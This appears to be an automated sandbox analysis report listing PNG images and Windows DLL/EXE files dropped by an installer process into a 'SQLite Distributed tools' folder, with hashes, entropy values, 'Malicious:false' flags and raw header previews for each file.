                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):24539
                                                                  Entropy (8bit):7.882270966578936
                                                                  Encrypted:false
                                                                  SSDEEP:384:ScnQsw4kEFuph4v4giaASsMb96TSG/TPci6xSHBiB09e+AplPHsIGHl85MBY:Jth4pxgiBU+d4iyShiBcYlPrGVS
                                                                  MD5:D4FACF0D1F1E69100F7C26C47B3A046A
                                                                  SHA1:F6EDFDDC4DF9EE7F19B84F7560BB687F6AACF771
                                                                  SHA-256:00F20B87820F0EA3D520BEF40440696B8B027DBA3B61217B2CFAABC3C2EE772B
                                                                  SHA-512:C39ACFAAC3B51F6703834100F473C1007A3B37F5F34B66FF2FF69FF89649BCC622411A3617DE190FE265DD212BBF5C22DCD913055A07A04DB3EA00B7F6DCDC45
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR..............x......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmp:CreateDate="2019-09-28T12:37:13-05:00" xmp:MetadataDate="2019-09-28T12:37:13-05:00" xmp:ModifyDate="2019-09-28T12:37:13-05:00" xmpMM:InstanceID="xmp.iid:375b1a00-fe67-0144-9c3c-4679b51298a6" xmpMM:DocumentID="adobe:docid:photoshop:a5224440-123c-e843-871a-6a18a0398a89" xmpMM:OriginalDocumentID="xmp.did:2bac810d-6639-4645-8951-3e184a073073" photoshop:Co
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\Images\is-AHE74.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):24539
                                                                  Entropy (8bit):7.882270966578936
                                                                  Encrypted:false
                                                                  SSDEEP:384:ScnQsw4kEFuph4v4giaASsMb96TSG/TPci6xSHBiB09e+AplPHsIGHl85MBY:Jth4pxgiBU+d4iyShiBcYlPrGVS
                                                                  MD5:D4FACF0D1F1E69100F7C26C47B3A046A
                                                                  SHA1:F6EDFDDC4DF9EE7F19B84F7560BB687F6AACF771
                                                                  SHA-256:00F20B87820F0EA3D520BEF40440696B8B027DBA3B61217B2CFAABC3C2EE772B
                                                                  SHA-512:C39ACFAAC3B51F6703834100F473C1007A3B37F5F34B66FF2FF69FF89649BCC622411A3617DE190FE265DD212BBF5C22DCD913055A07A04DB3EA00B7F6DCDC45
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR..............x......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmp:CreateDate="2019-09-28T12:37:13-05:00" xmp:MetadataDate="2019-09-28T12:37:13-05:00" xmp:ModifyDate="2019-09-28T12:37:13-05:00" xmpMM:InstanceID="xmp.iid:375b1a00-fe67-0144-9c3c-4679b51298a6" xmpMM:DocumentID="adobe:docid:photoshop:a5224440-123c-e843-871a-6a18a0398a89" xmpMM:OriginalDocumentID="xmp.did:2bac810d-6639-4645-8951-3e184a073073" photoshop:Co
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\Images\is-K34H6.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):626
                                                                  Entropy (8bit):7.532398674376607
                                                                  Encrypted:false
                                                                  SSDEEP:12:6v/72rxs+Ea6c8e8x8gMppPQI3Y8nHYQLTWWi9aJCrpghJeGjSbuWDop6SztN:3q+EFN+ppPVHnjHNErpE7SbrDoHN
                                                                  MD5:B56B675809D84482E2C0AFBE5058EB10
                                                                  SHA1:D2FD2E37C753EAC29FB925512871A4E11B8F0BBC
                                                                  SHA-256:98782D713D12B49595B100497E24D3C8D4AB111A5F9A66C630BD3F95D9303DF8
                                                                  SHA-512:550B2A2DBCF8250D24147ACE58B76D5E52BEE2F9C60688463F51E1CBE40D36EF55C8BBC6641B555839DD7B3C1EF457C9F6782D41103E9ECF9F17D6776464D9AA
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.SMo.@.}.u.n....S).8..P.8QB.*..s.[~Y..84.pA..BE.\....~@.-...4Y....dUb..ww....(.c...h.XV.$}.......!c...0.K.b..._.9#..u.O...p."...y.L.h6.;.L...%-......8x...i......T...%........~H.t....-:HT.........#BA.../....B....{o.2....*c*.Q..o....,.y...G*.d".$@H..Z.^.D...axB..,....,.Z..M......yU..Z........+.x...*.......R.......7....X.A|w.....4..a..N.0L.g.,....,...[...`.8..l4...p.n..'.....,R.M....I..\...&.\T....>..4.{.yV.i,b....bV.".uv.U.i.L&.N..Q...K.|o.V....H.^...tP......r.....v......z.).&.|n= ...8..%.%...?....d...v......IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\Images\is-MN68A.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):1660
                                                                  Entropy (8bit):7.861742067744583
                                                                  Encrypted:false
                                                                  SSDEEP:24:+zxKvG6a5cOpCnE4eItXQH1uPIvNbuplfaqqFfizxTfjpEQScUe4TeacKfpMHVkv:cNzd4edHBVbGiqbTfnSc+CNoPEaRZz
                                                                  MD5:69CD4229AC3C37B6F09697BD9B39546E
                                                                  SHA1:D7FD11FDD0CAE018005A9708C4E836BEC0C59ACF
                                                                  SHA-256:F72014A1D70B31C972D8A9F442F51EEC75FE518AA0C22184AC807FC01BA5C755
                                                                  SHA-512:E4CFEA6EAE24892A5AEBA757195A6411E47989B0256B3A7B3BF58B0F501F3E78B9CDA1A26FEBF6B954E4B41953F1C301A08E11F2A8E42F20FFE59F0F1AD48B1A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.WklSe.~....vc...@v..H@1.&..)........?(`B$..d..a.A.obB.. 1...(l.\.vsl...m......J../y..|=..}.....?..].VsC.W.R@4.M......9.#.a.K&e.......?....N..=.......`..5.9s.1>.^..Nb./--.L.gf.....A..;....".p/...%....%..2.T......c.8....$..jt&m....S.)..T.d2.Z.v.f.....wL...,..t ..erb.... ..P.e..pNM.........>}....7.(..6VV.s.N.:.....@$..z..x:...F.e...}?ON.t..E.Z.@y..U7*-g...>...)..u=..r.G"Pf.COO.3....h......:T".!r@K..x.-.Y.}..FFF......xe..(......Z....x....)..LZ.....B...2.Q......B..n.a.#...H..........xT....".#T2C.A.d...i..S.Tn..)..: .K......IT2.. ...#..Y...J....^..P2.....p>...Z.;w....>.(.EX+.P..V+..............z......FFG.n.(...E.&g-.$....~.X....SDv4.._.....E..Z]]..Y.d)2%......K..F.......V.......mb..........,...<..{...645...^.&lko.{...>.e...L..........z...;v.7N48'6L..{..T.Ci<.q.2`.;`{k[.7B..x...D.@.......y.[.8.p.P08..J...*....6.X,.cc........m-.M.z5*...l.2.+ .....LS..D..z.Ng.U2$.v.Z.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\Images\is-NS1E8.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):15050
                                                                  Entropy (8bit):7.720697171460719
                                                                  Encrypted:false
                                                                  SSDEEP:384:SWnwYPAxo1jf/uYK6Qm7lhkz2p+v2pX6pJa8uhdN2Z8:ZwYneT6Qm0zP8SZ8
                                                                  MD5:692C054B84C6D42288FEF1148DE9C662
                                                                  SHA1:12ADBAB728E3E008BF1C2825022B6D8CFDDC5511
                                                                  SHA-256:38A8A229A79CE48A4F6FD720C6693DA11A8CBE6AF160092149AD50ADA58D97F9
                                                                  SHA-512:96DCBDDA25E8821A8D7FCAA97A279308D5BACB7894BA31E51B67BDEC6FA535BE20025FAEF6E0C63900649F9985A22E6F31A7CA7D84BD1A1100B21343DAF20CE7
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR..............x......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmp:CreateDate="2019-09-28T12:37:04-05:00" xmp:MetadataDate="2019-09-28T12:37:04-05:00" xmp:ModifyDate="2019-09-28T12:37:04-05:00" xmpMM:InstanceID="xmp.iid:551d15ca-913b-f34c-98d9-318f319e6f37" xmpMM:DocumentID="adobe:docid:photoshop:8e931143-2477-6843-a821-16b1208fff60" xmpMM:OriginalDocumentID="xmp.did:7f532148-418c-9b48-95bf-b8594cd837cd" dc:format="i
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\Qt5QuickWidgets.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):59392
                                                                  Entropy (8bit):6.20485774748441
                                                                  Encrypted:false
                                                                  SSDEEP:1536:sioZheL/OWZqcGVE2KWqLqZ0qEozRXYDep2zM2rQfND1p:sioZc/OhDKLqDEozRXMep2zM2rQfND
                                                                  MD5:FBE938D603DF6DA86E3B1CCCAB37288D
                                                                  SHA1:5CCB8276CB0E2E97518579412BA975BB8A2EF419
                                                                  SHA-256:DF3DE6AF21F13DE3490065879B39E3D7A1D6ADD10D802B80B9A444555B8A516D
                                                                  SHA-512:A84F29562524BF633517D79AC61F3522CE3F3C91D4C445D05A03718713BAEA6918FBF7E7C990E779946BFA047662396D1B2D3AD2812C9C0BADF2A06E4C7128A7
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KO.....H...H...H.VxH...H]F.I...HTF.I...H]F.I...H]F.I...H]F.I...H.G.I...H...H{/.H.G.I...H.G.I...H.G.H...H..|H...H.G.I...HRich...H................PE..L......^...........!.....X..........&[.......p............................... ............@............................h...8.......................................p.......................0...........@............p...............................text....V.......X.................. ..`.rdata...t...p...v...\..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\Qt5SerialPort.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):59392
                                                                  Entropy (8bit):6.191569339599677
                                                                  Encrypted:false
                                                                  SSDEEP:768:rg5QxNAcb7iz+51dHOJgaVYen4HYEuOE9g4NW0ISSaNuqKJN88J5ka8h2psG/pwd:vacbL51dHOJ7ZZs1DqK780kVbpTYXf
                                                                  MD5:DA7428109EC54429D52EE54294B3D3BC
                                                                  SHA1:501BA92AE0B98E0E7057A189704045D8FE81510A
                                                                  SHA-256:6973BCFAE9601D217211191992FDF9A3170857DCD98570686B7B4172150ECA7F
                                                                  SHA-512:43E389CAF78A8FCE4B2D13508DC0E85B2FCDAB0D3943ED28B3A9C43AE3DF3F0348BA93A78362DFB5E5BDA8941D05560DB61651CF44524A21BC6757A383F01757
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......H.....Y...Y...Y..YY...Y^..X...Y^..X...Y^..X...Y^..X...YW..X...Y...X...Y...Y...Y...X...Y...X...Y..5Y...Y..]Y...Y...X...YRich...Y........................PE..L......^...........!.....x...p.......~....................................... ............@.....................................................................T...........................@...........@............................................text....w.......x.................. ..`.rdata...T.......V...|..............@..@.data...T...........................@....rsrc...............................@..@.reloc..T...........................@..B................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\UtilsLib.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):112600
                                                                  Entropy (8bit):6.3103874170339145
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3+M7hhFAHxQCqyT0u3U+PPxFp0tYCAFJtksMRXDh5G0CjwHb9vy6p4V7SpSDvNtW:uIhQRX3F6tLcJ6dRXDh5vPu7Tfza
                                                                  MD5:16FF6202991253FF981A6A7FA20436AA
                                                                  SHA1:F992669261166B099316EA9C6A3B6F16FE86FCD3
                                                                  SHA-256:BD18F22709D63C0156401ACA8E63F0E04490F3348191897B7360511221ADB134
                                                                  SHA-512:5232F55AB7C0630C0A2D43897F10805BCBDA97FAE3A661746C4E70FA9AC5A62AC2D1AC8EDA09E8B5DF6AA24957C43A9BEADAF7CAC26F88EE3AC7E66EEDA1F73D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.........." ..0.................. ........... ...............................^....`.................................h...O........................!..........0................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......(...............................................................^.(0....r...p(1...}....*:.(0.....}....*"..o2...*V.{....,..{.....o3...*^.(0....r?..p(1...}....*.*.0...........r...po4...-......(5...o6...o7...~H...%-.&~G.....k...s8...%.H...(...+o:....+A.o;...o7...~I...%-.&~G.....l...s8...%.I...(...+o=.....{.....o>....o....-....,..o.......&.{.....o>.....*.........L.M.....................#......../.s?...z~.....#...8M%iBZ(@...(A...(B...*..0..6........~....(C...,.s?...z.~...
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\bzip2.dll (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69120
                                                                  Entropy (8bit):6.190450623836321
                                                                  Encrypted:false
                                                                  SSDEEP:1536:S9FWW0igMY08p/41AdhEfWoh8eGf9NvvvvvvvvvvvvvvvvJQfBq:S9FxMJj3EWne290
                                                                  MD5:4143D4973E0F5A5180E114BDD868D4D2
                                                                  SHA1:B47FD2CF9DB0F37C04E4425085FB953CBCE81478
                                                                  SHA-256:DA25DB24809479051D980BE5E186926DD53233A76DFE357A455387646BEFCA76
                                                                  SHA-512:E21827712A4870461921E7996506FFE456DD2303B69DE370AA0499DDE2E4747A73D8C0E8BD7D91C5BBC414ED5EE06F36D172237489494B3DD311CCD95BA07EBC
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......G...........#...8............`.............Dh.........................p................ .............................. .......0... ...................`.......................................................................................text...............................`..`.data...............................@....rdata..@...........................@..@.bss.....................................edata..............................@..@.idata....... ......................@....rsrc.... ...0..."..................@....reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-1HQQF.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):59392
                                                                  Entropy (8bit):6.20485774748441
                                                                  Encrypted:false
                                                                  SSDEEP:1536:sioZheL/OWZqcGVE2KWqLqZ0qEozRXYDep2zM2rQfND1p:sioZc/OhDKLqDEozRXMep2zM2rQfND
                                                                  MD5:FBE938D603DF6DA86E3B1CCCAB37288D
                                                                  SHA1:5CCB8276CB0E2E97518579412BA975BB8A2EF419
                                                                  SHA-256:DF3DE6AF21F13DE3490065879B39E3D7A1D6ADD10D802B80B9A444555B8A516D
                                                                  SHA-512:A84F29562524BF633517D79AC61F3522CE3F3C91D4C445D05A03718713BAEA6918FBF7E7C990E779946BFA047662396D1B2D3AD2812C9C0BADF2A06E4C7128A7
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KO.....H...H...H.VxH...H]F.I...HTF.I...H]F.I...H]F.I...H]F.I...H.G.I...H...H{/.H.G.I...H.G.I...H.G.H...H..|H...H.G.I...HRich...H................PE..L......^...........!.....X..........&[.......p............................... ............@............................h...8.......................................p.......................0...........@............p...............................text....V.......X.................. ..`.rdata...t...p...v...\..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-1TNCV.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):94720
                                                                  Entropy (8bit):6.2283195662657125
                                                                  Encrypted:false
                                                                  SSDEEP:1536:lJ46GFya7vjnxvoPENgBPIO4qHlCef0vovpg/1H6lbEdozX5mAofEsyQh9:lJkBvjx2Ov1/8lgKb53Rah
                                                                  MD5:4299D8C96853F2210A3E7827AB6A4E80
                                                                  SHA1:3906ABBE7463D5E2DC50CC676E1AE8B51ADCAA06
                                                                  SHA-256:7F79589F36CFB1613ABB2F2338C6177AFD4984F3D6A8E18C08F13561796B3A7D
                                                                  SHA-512:58F86BC1639694499648F07BC3BA7B7B4BF7E95F4A6B3A93B4A1B271D587DF909771C7669CC34BE56098663231BB6B39BD9B17F7D844B9B2D9387A3594C64EF1
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#.........n......0........0....|n................................=F........ .........................u.......l...................................................................................t................................text...4...........................`.P`.data....&...0...(..................@.`..rdata.......`.......>..............@.`@.bss..................................`..edata..u............V..............@.0@.idata..l............^..............@.0..CRT....,............f..............@.0..tls.... ............h..............@.0..reloc...............j..............@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-4V3H8.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):6177792
                                                                  Entropy (8bit):6.78864923284668
                                                                  Encrypted:false
                                                                  SSDEEP:98304:ofXC9cpYoBnBVABxYIw9G0f46+nSBRj6vnqrHS4gP85:LSptBViYIwa6a/nEH
                                                                  MD5:8B3831A85EAC83E63B4A0DEAA53B8404
                                                                  SHA1:BCFF5A8EF296A0A8A23BC2C05E0BB15240C5ECAA
                                                                  SHA-256:6042994FDFB49BF9342A79B33C902FD020246EEFB5AEC74F0A9E9AC8F35C1C97
                                                                  SHA-512:0C55C16EBBA5F176D401E40693BFBF9102364862075C67577793768BBB89D6CDA979E4C20484A1FCD42CA7CC339A1CB649FF1A3D4FD24FF12AF1D3F705CE7957
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........j.>...m...m...m.s.m...m.dpm...m.~.l...m.~.l...m.~.l...m.V.l...m.~.l...m.`.l...mvh.l...m...m...mvh.l...m.~.l...m.~rm...m...m...m.~.l...mRich...m'..H&.jH.mhI&.jHRich'.jH........PE..L...w.?a..................?..~......*W%.......?...@..................................X^...@...................................V.........Ta...................p........U.p...................@.U.....p.U.@.............?.(............................text.....?.......?................. ....rdata..`5....?..6....?.............@..@.data........ W..\....V.............@....rsrc...Ta.......b...XX.............@..@.reloc.......p........[.............@..B........................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-9DAD0.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):52224
                                                                  Entropy (8bit):6.245414002002033
                                                                  Encrypted:false
                                                                  SSDEEP:768:OsH/CHGrCasbXzxUuAEZ1rXK4bgCAosF14HYs44HZcCq+TEbbJwziIHc42+ewBmV:OsRvQras7jHYN1u+JwZmwdtmns
                                                                  MD5:00D68E20169F763376095705C1520C4F
                                                                  SHA1:75EC5E1974654613C9EEEFF047F1EB58694FD656
                                                                  SHA-256:3C12F0A9F43CF88D82F5CC482627237F51A63A293EF95F2342222EBDE1FB909F
                                                                  SHA-512:4E180A8CE0E30CFC82883D05D8708FE82442541A4C522055D00F381BF47A0A4F269BC1F5E1EBBFEC888EDBE455CE145E24CB4C734E682E830322E13479A62C34
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..V...........#................0..............i.........................@............... .................................`............................0............................... .......................................................text...$...........................`.P`.data...D...........................@.0..rdata..T...........................@.`@.bss..................................`..edata..............................@.0@.idata..`...........................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..reloc.......0......................@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-A5HMB.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):87040
                                                                  Entropy (8bit):6.204875539391202
                                                                  Encrypted:false
                                                                  SSDEEP:1536:G3KDgzmAgyM0tlnOZO5WfQeN7VHS6WnjFFbm9B8JTKAFh2:Ga2SOtAZO5cQe5s6+rb2WzFh2
                                                                  MD5:4C85DFBA434A42BCD7E31D33E480DCE2
                                                                  SHA1:271B47765442FC9E50E0CDF46D0ADB8A854FD496
                                                                  SHA-256:8E96A33FC8635E1F12E14E3C9AAC6AD5EA21F7B70F0E9E423B487BB57EBBCE1E
                                                                  SHA-512:0E0BD76353D88B40FE77E81108A01EB61931B13FEC1846985FB0508702967FE4177D2A5C48E8C292EDF0F666813DC54B3757843A95846132D41964552E79E7EF
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..V...........#.........P......0..............q................................!......... ......................`.......p..................................X....................................................q..X............................text...............................`.P`.data...D...........................@.0..rdata...O.......P..................@.`@.bss.........P........................`..edata.......`.......*..............@.0@.idata.......p.......:..............@.0..CRT....,............D..............@.0..tls.... ............F..............@.0..reloc..X............H..............@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-AKVFR.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):67584
                                                                  Entropy (8bit):6.383793162041836
                                                                  Encrypted:false
                                                                  SSDEEP:1536:rfPpv2oNi2l7RyqgAVn21UH+KUf7jDq6LmG1h85:rfPpv2oYmGAVu5K4T7LRH8
                                                                  MD5:29F7AAB4E7367014DB45F866AB052327
                                                                  SHA1:F2BC284D7ACBEF09FEA7136B9156ED79289059F7
                                                                  SHA-256:2204684F02AE5185DEAA3704ED8355A737018CAE320E68E3209311D1F2506237
                                                                  SHA-512:46917B7C58E46DCAAA7F9740BC65C7323FE4A999CE35D3C670C7B8DCB205BE2667A7A5D21DFEE8F32F42A1EE41F6118DF896D02A96AD85A0B0F88C3B79B87143
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#................0..............j.................................3........ ......................0.......@...............................p...............................`......................XA...............................text...............................`.P`.data...D...........................@.0..rdata..............................@.`@.bss......... ........................`..edata.......0......................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-C2M67.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):59392
                                                                  Entropy (8bit):6.191569339599677
                                                                  Encrypted:false
                                                                  SSDEEP:768:rg5QxNAcb7iz+51dHOJgaVYen4HYEuOE9g4NW0ISSaNuqKJN88J5ka8h2psG/pwd:vacbL51dHOJ7ZZs1DqK780kVbpTYXf
                                                                  MD5:DA7428109EC54429D52EE54294B3D3BC
                                                                  SHA1:501BA92AE0B98E0E7057A189704045D8FE81510A
                                                                  SHA-256:6973BCFAE9601D217211191992FDF9A3170857DCD98570686B7B4172150ECA7F
                                                                  SHA-512:43E389CAF78A8FCE4B2D13508DC0E85B2FCDAB0D3943ED28B3A9C43AE3DF3F0348BA93A78362DFB5E5BDA8941D05560DB61651CF44524A21BC6757A383F01757
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......H.....Y...Y...Y..YY...Y^..X...Y^..X...Y^..X...Y^..X...YW..X...Y...X...Y...Y...Y...X...Y...X...Y..5Y...Y..]Y...Y...X...YRich...Y........................PE..L......^...........!.....x...p.......~....................................... ............@.....................................................................T...........................@...........@............................................text....w.......x.................. ..`.rdata...T.......V...|..............@..@.data...T...........................@....rsrc...............................@..@.reloc..T...........................@..B................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-C5HIV.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69120
                                                                  Entropy (8bit):6.190450623836321
                                                                  Encrypted:false
                                                                  SSDEEP:1536:S9FWW0igMY08p/41AdhEfWoh8eGf9NvvvvvvvvvvvvvvvvJQfBq:S9FxMJj3EWne290
                                                                  MD5:4143D4973E0F5A5180E114BDD868D4D2
                                                                  SHA1:B47FD2CF9DB0F37C04E4425085FB953CBCE81478
                                                                  SHA-256:DA25DB24809479051D980BE5E186926DD53233A76DFE357A455387646BEFCA76
                                                                  SHA-512:E21827712A4870461921E7996506FFE456DD2303B69DE370AA0499DDE2E4747A73D8C0E8BD7D91C5BBC414ED5EE06F36D172237489494B3DD311CCD95BA07EBC
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......G...........#...8............`.............Dh.........................p................ .............................. .......0... ...................`.......................................................................................text...............................`..`.data...............................@....rdata..@...........................@..@.bss.....................................edata..............................@..@.idata....... ......................@....rsrc.... ...0..."..................@....reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\is-CLKBK.tmp
